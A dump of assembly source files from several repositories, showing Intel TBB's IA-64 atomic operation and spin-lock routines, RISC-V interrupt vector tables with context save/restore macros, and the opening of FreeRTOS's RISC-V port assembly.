mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg8.acq r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_8acquire
br.ret.sptk.many b0 // previous value in r8
Inc_8acquire:
fetchadd8.acq r8=[r32],1
br.ret.sptk.many b0
Dec_8acquire:
fetchadd8.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8acquire#
# 62 "<stdin>"
.section .text
.align 16
// 64-bit fetch-and-store, full-fence variant: fence, then exchange.
.proc __TBB_machine_fetchstore8__TBB_full_fence#
.global __TBB_machine_fetchstore8__TBB_full_fence#
__TBB_machine_fetchstore8__TBB_full_fence:
mf
;;
xchg8 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8__TBB_full_fence#
// 64-bit fetch-and-store, acquire variant (bare atomic exchange).
.proc __TBB_machine_fetchstore8acquire#
.global __TBB_machine_fetchstore8acquire#
__TBB_machine_fetchstore8acquire:
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8acquire#
# 88 "<stdin>"
.section .text
.align 16
// 64-bit compare-and-swap, full-fence variant: fence, then acquire CAS.
.proc __TBB_machine_cmpswp8__TBB_full_fence#
.global __TBB_machine_cmpswp8__TBB_full_fence#
__TBB_machine_cmpswp8__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp8acquire
}
.endp __TBB_machine_cmpswp8__TBB_full_fence#
// 64-bit CAS with acquire semantics: r32 = address, r33 = new value,
// r34 = comparand (full register width, no zero-extension needed);
// returns the previous value in r8.
.proc __TBB_machine_cmpswp8acquire#
.global __TBB_machine_cmpswp8acquire#
__TBB_machine_cmpswp8acquire:
mov ar.ccv=r34
;;
cmpxchg8.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// Byte fetch-and-add with release semantics: r32 = address,
// r33 = addend; returns the previous value in r8 (cmpxchg retry loop).
.proc __TBB_machine_fetchadd1release#
.global __TBB_machine_fetchadd1release#
__TBB_machine_fetchadd1release:
ld1 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_1release:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg1.rel r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_1release
br.ret.sptk.many b0 // previous value in r8
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1release#
# 62 "<stdin>"
.section .text
.align 16
// Byte fetch-and-store, release variant: the preceding mf provides the
// release ordering before the exchange.
.proc __TBB_machine_fetchstore1release#
.global __TBB_machine_fetchstore1release#
__TBB_machine_fetchstore1release:
mf
;;
xchg1 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// Byte CAS with release semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp1release#
.global __TBB_machine_cmpswp1release#
__TBB_machine_cmpswp1release:
zxt1 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg1.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// 16-bit fetch-and-add with release semantics: r32 = address,
// r33 = addend; returns the previous value in r8 (cmpxchg retry loop).
.proc __TBB_machine_fetchadd2release#
.global __TBB_machine_fetchadd2release#
__TBB_machine_fetchadd2release:
ld2 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_2release:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg2.rel r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_2release
br.ret.sptk.many b0 // previous value in r8
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2release#
# 62 "<stdin>"
.section .text
.align 16
// 16-bit fetch-and-store, release variant: the preceding mf provides
// the release ordering before the exchange.
.proc __TBB_machine_fetchstore2release#
.global __TBB_machine_fetchstore2release#
__TBB_machine_fetchstore2release:
mf
;;
xchg2 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 16-bit CAS with release semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp2release#
.global __TBB_machine_cmpswp2release#
__TBB_machine_cmpswp2release:
zxt2 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg2.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// 32-bit fetch-and-add with release semantics. Addends of +1/-1 take a
// fast path using the native fetchadd4 instruction; anything else goes
// through a cmpxchg retry loop. r32 = address, r33 = addend; previous
// value returned in r8.
.proc __TBB_machine_fetchadd4release#
.global __TBB_machine_fetchadd4release#
__TBB_machine_fetchadd4release:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_4release
(p8) br.cond.dpnt Dec_4release
;;
ld4 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_4release:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg4.rel r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_4release
br.ret.sptk.many b0 // previous value in r8
Inc_4release:
fetchadd4.rel r8=[r32],1
br.ret.sptk.many b0
Dec_4release:
fetchadd4.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4release#
# 62 "<stdin>"
.section .text
.align 16
// 32-bit fetch-and-store, release variant: the preceding mf provides
// the release ordering before the exchange.
.proc __TBB_machine_fetchstore4release#
.global __TBB_machine_fetchstore4release#
__TBB_machine_fetchstore4release:
mf
;;
xchg4 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 32-bit CAS with release semantics: r32 = address, r33 = new value,
// r34 = comparand; returns the previous value in r8.
.proc __TBB_machine_cmpswp4release#
.global __TBB_machine_cmpswp4release#
__TBB_machine_cmpswp4release:
zxt4 r34=r34 // zero-extend comparand to register width
;;
mov ar.ccv=r34
;;
cmpxchg4.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
// 64-bit fetch-and-add with release semantics. Addends of +1/-1 take a
// fast path using the native fetchadd8 instruction; anything else goes
// through a cmpxchg retry loop. r32 = address, r33 = addend; previous
// value returned in r8.
.proc __TBB_machine_fetchadd8release#
.global __TBB_machine_fetchadd8release#
__TBB_machine_fetchadd8release:
cmp.eq p6,p0=1,r33 // addend == +1 ?
cmp.eq p8,p0=-1,r33 // addend == -1 ?
(p6) br.cond.dptk Inc_8release
(p8) br.cond.dpnt Dec_8release
;;
ld8 r9=[r32] // r9 = current value (CAS expected value)
;;
Retry_8release:
mov ar.ccv=r9 // comparand for cmpxchg
mov r8=r9; // r8 = value to return on success
add r10=r9,r33 // r10 = proposed new value
;;
cmpxchg8.rel r9=[r32],r10,ar.ccv // r9 = value actually observed
;;
cmp.ne p7,p0=r8,r9 // observed != expected -> lost the race
(p7) br.cond.dpnt Retry_8release
br.ret.sptk.many b0 // previous value in r8
Inc_8release:
fetchadd8.rel r8=[r32],1
br.ret.sptk.many b0
Dec_8release:
fetchadd8.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8release#
# 62 "<stdin>"
.section .text
.align 16
// 64-bit fetch-and-store, release variant: the preceding mf provides
// the release ordering before the exchange.
.proc __TBB_machine_fetchstore8release#
.global __TBB_machine_fetchstore8release#
__TBB_machine_fetchstore8release:
mf
;;
xchg8 r8=[r32],r33 // r8 = old value, [r32] = r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
// 64-bit CAS with release semantics: r32 = address, r33 = new value,
// r34 = comparand (full register width, no zero-extension needed);
// returns the previous value in r8.
.proc __TBB_machine_cmpswp8release#
.global __TBB_machine_cmpswp8release#
__TBB_machine_cmpswp8release:
mov ar.ccv=r34
;;
cmpxchg8.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8release#
|
AIFM-sys/AIFM
| 2,034
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/lock_byte.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// Support for class TinyLock
.section .text
.align 16
// unsigned int __TBB_machine_trylockbyte( byte& flag );
// r32 = address of flag
// Returns 1 in r8 if the lock byte was acquired (0 -> 1 transition),
// 0 if it was already held or the CAS lost a race.
.proc __TBB_machine_trylockbyte#
.global __TBB_machine_trylockbyte#
// Symbolic register names for readability.
ADDRESS_OF_FLAG=r32
RETCODE=r8
FLAG=r9
BUSY=r10
SCRATCH=r11
__TBB_machine_trylockbyte:
ld1.acq FLAG=[ADDRESS_OF_FLAG] // sample the flag first (cheap test)
mov BUSY=1
mov RETCODE=0 // default: not acquired
;;
cmp.ne p6,p0=0,FLAG // already locked?
mov ar.ccv=r0 // CAS comparand: expect 0 (unlocked)
(p6) br.ret.sptk.many b0 // yes -> return 0 without a CAS
;;
cmpxchg1.acq SCRATCH=[ADDRESS_OF_FLAG],BUSY,ar.ccv // Try to acquire lock
;;
cmp.eq p6,p0=0,SCRATCH // observed 0 -> we installed BUSY
;;
(p6) mov RETCODE=1
br.ret.sptk.many b0
.endp __TBB_machine_trylockbyte#
|
AIFM-sys/AIFM
| 1,583
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/ia64_misc.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// RSE backing store pointer retrieval
.section .text
.align 16
// void* __TBB_get_bsp( void );
// Returns the current RSE backing store pointer (ar.bsp) in r8.
.proc __TBB_get_bsp#
.global __TBB_get_bsp#
__TBB_get_bsp:
mov r8=ar.bsp
br.ret.sptk.many b0
.endp __TBB_get_bsp#
|
AIFM-sys/AIFM
| 1,704
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/pause.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
.section .text
.align 16
// void __TBB_machine_pause( long count );
// r32 = count
// Spins for `count` iterations, issuing hint.m 0 (the IA-64 pause hint)
// on each pass.
// NOTE(review): count <= 0 would decrement past zero and spin until the
// register wraps; presumably callers always pass count >= 1 — confirm.
.proc __TBB_machine_pause#
.global __TBB_machine_pause#
count = r32
__TBB_machine_pause:
hint.m 0 // pause hint: be polite to the sibling thread
add count=-1,count
;;
cmp.eq p6,p7=0,count
(p7) br.cond.dpnt __TBB_machine_pause // not done -> spin again
(p6) br.ret.sptk.many b0
.endp __TBB_machine_pause#
|
aignacio/riscv_verilator_model
| 4,012
|
sw/hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate stack space: we save the context of the 16 caller-saved
# 32-bit registers, i.e. 16 * (4 bytes) = 64 bytes.
addi sp, sp, -64
# Save the "caller" (volatile) registers on the stack.
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# Restore the context that trap_entry stored on the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...deallocate the stack frame...
addi sp, sp, 64
# ...and return from the trap with mret.
mret
.endm
.option norvc
.section .isr_vector
# This section lists the PC addresses the hardware jumps to on trap
# entry. Vectored interrupt mode is assumed (i.e. MTVEC[1:0] = 1):
#   synchronous trap  = exceptions  (always entry 0)
#   asynchronous trap = interrupts  (entry = base + 4 * cause)
.align 8 # Align to the next 2^8 = 256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
# NOTE(review): the uart/gpio/timer slots below are platform-specific
# interrupt causes — confirm against the SoC's interrupt map.
j uart_trap
j gpio_trap
j trap_machine_external_int
j machine_timer_trap
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
# Each handler below: save context, call the C ISR (defined elsewhere),
# restore context and mret (trap_exit is reached by fall-through).
_synctrap:
trap_entry
# NOTE(review): for synchronous exceptions mepc points at the faulting
# instruction; presumably isr_synctrap advances mepc — confirm.
jal isr_synctrap
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
machine_timer_trap:
trap_entry
jal isr_m_timer
trap_exit
uart_trap:
trap_entry
jal isr_uart
trap_exit
gpio_trap:
trap_entry
jal isr_gpio
trap_exit
|
aignacio/riscv_verilator_model
| 3,868
|
sw/boot_rom/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate stack space: we save the context of the 16 caller-saved
# 32-bit registers, i.e. 16 * (4 bytes) = 64 bytes.
addi sp, sp, -64
# Save the "caller" (volatile) registers on the stack.
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# Restore the context that trap_entry stored on the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...deallocate the stack frame...
addi sp, sp, 64
# ...and return from the trap with mret.
mret
.endm
.option norvc
.section .isr_vector
# This section lists the PC addresses the hardware jumps to on trap
# entry. Vectored interrupt mode is assumed (i.e. MTVEC[1:0] = 1):
#   synchronous trap  = exceptions  (always entry 0)
#   asynchronous trap = interrupts  (entry = base + 4 * cause)
# All interrupt causes funnel into the single machine-external handler.
.align 8 # Align to the next 2^8 = 256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
j trap_machine_external_int
# Each handler below: save context, call the C ISR (defined elsewhere),
# restore context and mret (trap_exit is reached by fall-through).
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 3,310
|
sw/hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
# trap_entry: common trap prologue. Saves every RISC-V caller-saved
# integer register so the C ISR invoked via `jal` below may clobber
# them freely; callee-saved registers (s0-s11) are preserved by the
# C calling convention and need no storage here.
.macro trap_entry
# Allocate space on the stack; we need to save the
# context of 16 32-bit registers, which equals
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
# trap_exit: common trap epilogue. Restores the registers stored by
# trap_entry (same offsets, same order), releases the 64-byte frame,
# and returns from the trap with mret.
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...then deallocate the stack space and return
addi sp, sp, 64
# from the trap with mret
mret
.endm
.option norvc # compressed instructions disabled so every vector slot below is exactly 4 bytes
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will jump to on trap execution. In the code below we consider that
# vectored interrupts are activated (i.e. MTVEC[1:0] = 1), so an
# asynchronous trap with cause N enters at [Trap base] + 4*N, while
# every synchronous trap enters at [Trap base] itself.
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
# Handlers: each saves the caller-saved context (trap_entry), calls its
# C ISR, then restores the context and returns with mret (trap_exit).
_synctrap: # exceptions (synchronous traps)
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int: # machine software interrupt (cause 3)
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int: # machine timer interrupt (cause 7)
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int: # machine external interrupt (cause 11)
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 19,101
|
sw/libs/FreeRTOS-Kernel/portable/GCC/RISC-V/portASM.S
|
/*
* FreeRTOS Kernel V10.4.6
* Copyright (C) 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* SPDX-License-Identifier: MIT
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of
* this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to
* use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
* the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* https://www.FreeRTOS.org
* https://github.com/FreeRTOS
*
*/
/*
* The FreeRTOS kernel's RISC-V port is split between the code that is
* common across all currently supported RISC-V chips (implementations of the
* RISC-V ISA), and code which tailors the port to a specific RISC-V chip:
*
* + The code that is common to all RISC-V chips is implemented in
* FreeRTOS\Source\portable\GCC\RISC-V-RV32\portASM.S. There is only one
* portASM.S file because the same file is used no matter which RISC-V chip is
* in use.
*
* + The code that tailors the kernel's RISC-V port to a specific RISC-V
* chip is implemented in freertos_risc_v_chip_specific_extensions.h. There
* is one freertos_risc_v_chip_specific_extensions.h that can be used with any
* RISC-V chip that both includes a standard CLINT and does not add to the
* base set of RISC-V registers. There are additional
* freertos_risc_v_chip_specific_extensions.h files for RISC-V implementations
* that do not include a standard CLINT or do add to the base set of RISC-V
* registers.
*
* CARE MUST BE TAKEN TO INCLUDE THE CORRECT
* freertos_risc_v_chip_specific_extensions.h HEADER FILE FOR THE CHIP
* IN USE. To include the correct freertos_risc_v_chip_specific_extensions.h
* header file ensure the path to the correct header file is in the assembler's
* include path.
*
* This freertos_risc_v_chip_specific_extensions.h is for use on RISC-V chips
* that include a standard CLINT and do not add to the base set of RISC-V
* registers.
*
*/
#if __riscv_xlen == 64
#define portWORD_SIZE 8
#define store_x sd
#define load_x ld
#elif __riscv_xlen == 32
#define store_x sw
#define load_x lw
#define portWORD_SIZE 4
#else
#error Assembler did not define __riscv_xlen
#endif
#include "freertos_risc_v_chip_specific_extensions.h"
/* Check the freertos_risc_v_chip_specific_extensions.h and/or command line
definitions. */
#if defined( portasmHAS_CLINT ) && defined( portasmHAS_MTIME )
#error The portasmHAS_CLINT constant has been deprecated. Please replace it with portasmHAS_MTIME. portasmHAS_CLINT and portasmHAS_MTIME cannot both be defined at once. See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
